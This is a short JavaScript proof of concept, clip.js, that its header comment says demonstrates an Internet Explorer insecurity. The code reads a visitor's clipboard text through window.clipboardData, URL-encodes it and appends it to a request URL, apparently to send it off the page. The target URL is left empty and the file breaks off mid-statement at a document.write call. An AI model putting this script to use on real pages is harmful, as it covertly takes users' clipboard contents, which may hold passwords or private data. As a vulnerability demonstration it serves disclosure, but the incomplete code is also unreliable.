/* clip.js v0.1a 080406 keith beckman * http://alphahelical.com/code/misc/clip * This script is used solely to demonstrate an insecurity in * Microsoft Internet Explorer. */ if(window.clipboardData) { var action = ''; var x = encodeURI(window.clipboardData.getData("Text")); var src = action + '?x=' + x; document.write('